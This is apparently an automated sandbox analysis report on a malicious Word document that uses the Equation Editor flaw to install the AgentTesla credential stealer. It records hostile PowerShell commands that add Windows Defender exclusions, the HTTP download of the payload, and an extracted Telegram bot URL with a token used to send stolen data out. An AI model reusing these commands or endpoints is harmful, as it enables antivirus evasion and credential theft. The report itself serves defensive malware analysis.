Play interactive tour

Edit tour

Analysis Report PO5421-allignright.doc

Overview

General Information

Sample Name:	PO5421-allignright.doc
Analysis ID:	404224
MD5:	901e61918c3c108ebe8d6eabd18d0cc4
SHA1:	bbc834bb8d6a92e7070276884ccde86c0e2f6f38
SHA256:	8e7e22725654ca02a0c9d079fa96ac9b53f131cf029076b90934b50a23a36ccb
Tags:	AgentTesladoc
Infos:
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Powershell adding suspicious path to exclusion list

Yara detected AgentTesla

Adds a directory exclusion to Windows Defender

Creates an autostart registry key pointing to binary in C:\Windows

Creates multiple autostart registry keys

Drops PE files to the startup folder

Drops PE files with benign system names

Drops executables to the windows directory (C:\Windows) and starts them

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Installs a global keyboard hook

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to delay execution (extensive OutputDebugStringW loop)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Uses the Telegram API (likely for C&C communication)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Binary contains a suspicious time stamp

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Sigma detected: Non Interactive PowerShell

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 764 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2520 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

CTF loader_es.exe (PID: 2708 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)

powershell.exe (PID: 2340 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 260 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 2768 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 2460 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

Bw6d8Paf6bOV36xS4N6.exe (PID: 2916 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)

powershell.exe (PID: 2568 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 2888 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 952 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 2556 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

Bw6d8Paf6bOV36xS4N6.exe (PID: 2284 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)

powershell.exe (PID: 2200 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 2248 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 2328 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

CTF loader_es.exe (PID: 2520 cmdline: C:\Users\user\AppData\Roaming\CTF loader_es.exe MD5: D96F52FC8733D2F4A127BDC44D4CEB25)

Bw6d8Paf6bOV36xS4N6.exe (PID: 1836 cmdline: 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)

powershell.exe (PID: 2928 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 2976 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 2204 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

powershell.exe (PID: 2544 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' -Force MD5: 92F44E405DB16AC55D97E3BFE3B132FA)

svchost.exe (PID: 2492 cmdline: 'C:\Windows\Resources\Themes\aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe' MD5: D96F52FC8733D2F4A127BDC44D4CEB25)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1656309456", "Chat URL": "https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/sendDocument"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.2163761430.0000000003D1A000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000015.00000002.2356104817.0000000002794000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000015.00000002.2356104817.0000000002794000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.2191309843.00000000039DA000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000015.00000002.2354759653.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000015.00000002.2355909914.00000000026B1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000015.00000002.2355909914.00000000026B1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CTF loader_es.exe PID: 2708	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 3 entries

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 52.218.170.106, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2520, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2520, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\CTF loader_es.exe, CommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\CTF loader_es.exe, NewProcessName: C:\Users\user\AppData\Roaming\CTF loader_es.exe, OriginalFileName: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2520, ProcessCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ProcessId: 2708

Sigma detected: Non Interactive PowerShell

Show sources

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentImage: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentProcessId: 2708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\CTF loader_es.exe' -Force, ProcessId: 2340

Malware Analysis System Evasion:

Sigma detected: Powershell adding suspicious path to exclusion list

Show sources

Source: Process started

Author: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentImage: C:\Users\user\AppData\Roaming\CTF loader_es.exe, ParentProcessId: 2708, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe' -Force, ProcessId: 260

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: 13.2.Bw6d8Paf6bOV36xS4N6.exe.39dac88.7.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1656309456", "Chat URL": "https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/sendDocument"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	ReversingLabs: Detection: 44%

Multi AV Scanner detection for submitted file

Show sources

Source: PO5421-allignright.doc

ReversingLabs: Detection: 19%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mad[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Bw6d8Paf6bOV36xS4N6.exe	Joe Sandbox ML: detected
Source: C:\Windows\Resources\Themes\Aero\Shell\eCD9cjXnQ68Ged31T2X6ac6dL39YG124d98OXa10c044\svchost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\CTF loader_es.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49172 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49173 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49174 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49175 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49176 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49177 version: TLS 1.2

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2126177757.00000000062CD000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
Source:	Binary string: ??\C:\Windows\system32\netutils.dllhell\v1.0\netutils.dllnfig\v2.0.50727.312\security.config.cch.260.7193798tion.pdby.resources.exes.exeI.ni.dll source: powershell.exe, 00000007.00000002.2109706042.00000000006AB000.00000004.00000020.sdmp
Source:	Binary string: C:\Windows\System.Management.Automation.pdbV source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
Source:	Binary string: dows\System.Management.Automation.pdbpdbion.pdbn\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb0FB-4BFC-874A-C0F2E0B9FA8E}\WinDirStat\windirstat.exed source: powershell.exe, 00000016.00000002.2154655954.00000000007B3000.00000004.00000020.sdmp
Source:	Binary string: indows\System.Management.Automation.pdbpdbion.pdbB source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
Source:	Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp
Source:	Binary string: mscorrc.pdb source: powershell.exe, 00000005.00000002.2112205966.0000000002A50000.00000002.00000001.sdmp
Source:	Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2112108084.00000000029D6000.00000004.00000040.sdmp, powershell.exe, 00000007.00000002.2110370004.0000000000916000.00000004.00000040.sdmp

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Directory queried: number of queries: 2505

Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Source: C:\Users\user\AppData\Roaming\CTF loader_es.exe	File opened: C:\Users\user\

Source: global traffic

DNS query: name: miolouno.s3-us-west-2.amazonaws.com

Source: global traffic

TCP traffic: 192.168.2.22:49166 -> 149.154.167.220:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 52.218.170.106:80

Networking:

Uses the Telegram API (likely for C&C communication)

Show sources

Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org
Source: unknown	DNS query: name: api.telegram.org

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: global traffic

HTTP traffic detected: GET /mad.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: miolouno.s3-us-west-2.amazonaws.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{A5DAEF2E-EB6B-4CC4-8C38-663EBE143117}.tmp

Jump to behavior

Source: global traffic

Source: CTF loader_es.exe, 00000004.00000002.2184998568.0000000006060000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp

String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: miolouno.s3-us-west-2.amazonaws.com

Source: CTF loader_es.exe, 00000004.00000002.2184998568.0000000006060000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: CTF loader_es.exe, 00000004.00000002.2184998568.0000000006060000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: CTF loader_es.exe, 00000004.00000002.2186751004.0000000006247000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2114647306.0000000002D27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: CTF loader_es.exe, 00000004.00000002.2186751004.0000000006247000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2114647306.0000000002D27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: CTF loader_es.exe, 00000004.00000002.2180855712.00000000055E0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2109743393.0000000002080000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: CTF loader_es.exe, 00000004.00000003.2115015992.0000000002C2D000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CTF loader_es.exe, 00000004.00000002.2186751004.0000000006247000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2114647306.0000000002D27000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: CTF loader_es.exe, 00000004.00000002.2186751004.0000000006247000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2114647306.0000000002D27000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: CTF loader_es.exe, 00000004.00000002.2180855712.00000000055E0000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2109743393.0000000002080000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: CTF loader_es.exe, 00000004.00000002.2184998568.0000000006060000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: CTF loader_es.exe, 00000004.00000002.2186751004.0000000006247000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2114647306.0000000002D27000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: CTF loader_es.exe, 00000004.00000002.2184998568.0000000006060000.00000002.00000001.sdmp, powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000005.00000003.2097243678.000000000026C000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000005.00000003.2097243678.000000000026C000.00000004.00000001.sdmp	String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000005.00000002.2112599961.0000000002B40000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.
Source: CTF loader_es.exe, 00000004.00000002.2163761430.0000000003D1A000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1774464259:AAF9FzZxHVqbPEcJ50c3sNsdvyt_OEQ0GcA/
Source: CTF loader_es.exe, 00000004.00000002.2163761430.0000000003D1A000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown	Network traffic detected: HTTP traffic on port 49172 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49170 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49174 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49177
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49176
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49174
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49173
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49172
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49171
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49170
Source: unknown	Network traffic detected: HTTP traffic on port 49175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49171 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49173 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49177 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49166 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49167 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49169 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49171 version: TLS 1.2
